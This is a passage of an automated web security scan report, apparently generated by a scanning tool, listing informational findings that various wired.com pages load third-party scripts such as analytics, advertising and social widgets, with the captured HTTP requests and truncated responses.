Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:51:58 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=472
Expires: Wed, 12 Jan 2011 15:42:59 GMT
Date: Wed, 12 Jan 2011 15:35:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.164. http://www.wired.com/threatlevel/tag/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.165. http://www.wired.com/threatlevel/tag/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:20:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=434
Expires: Wed, 12 Jan 2011 15:42:38 GMT
Date: Wed, 12 Jan 2011 15:35:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.166. http://www.wired.com/threatlevel/tag/riaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/riaa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/riaa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.167. http://www.wired.com/threatlevel/tag/segvec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/segvec/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/segvec/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:26 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:35:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.168. http://www.wired.com/threatlevel/tag/supreme-court/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/supreme-court/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/supreme-court/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.169. http://www.wired.com/threatlevel/tag/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/surveillance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/surveillance/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:39 GMT
Date: Wed, 12 Jan 2011 15:35:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.170. http://www.wired.com/threatlevel/tag/tjx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tjx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/tjx/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:40 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.171. http://www.wired.com/threatlevel/tag/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/tsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/tsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.172. http://www.wired.com/threatlevel/tag/twitter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/twitter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/twitter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:54:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=459
Expires: Wed, 12 Jan 2011 15:43:21 GMT
Date: Wed, 12 Jan 2011 15:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.173. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/virginia-tech-shootings/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/virginia-tech-shootings/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:06:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:43:41 GMT
Date: Wed, 12 Jan 2011 15:35:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.174. http://www.wired.com/threatlevel/tag/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/wikileaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/wikileaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:45 GMT
Date: Wed, 12 Jan 2011 15:35:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.175. http://www.wired.com/topics/Claude_Cassirer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Claude_Cassirer

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Claude_Cassirer HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:24 GMT
Date: Wed, 12 Jan 2011 15:41:24 GMT
Content-Length: 32354
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.176. http://www.wired.com/topics/Florida previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Florida

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Florida HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.177. http://www.wired.com/topics/Spain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Spain

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Spain HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.178. http://www.wired.com/topics/United_States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/United_States

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/United_States HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.179. http://www.wired.com/topics/Western_Europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/Western_Europe

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/Western_Europe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.180. http://www.wired.com/topics/WikiLeaks.org previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/topics/WikiLeaks.org

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /topics/WikiLeaks.org HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.181. http://www.wired.com/underwire/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/underwire/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /underwire/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:02:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=337
Expires: Wed, 12 Jan 2011 05:10:05 GMT
Date: Wed, 12 Jan 2011 05:04:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
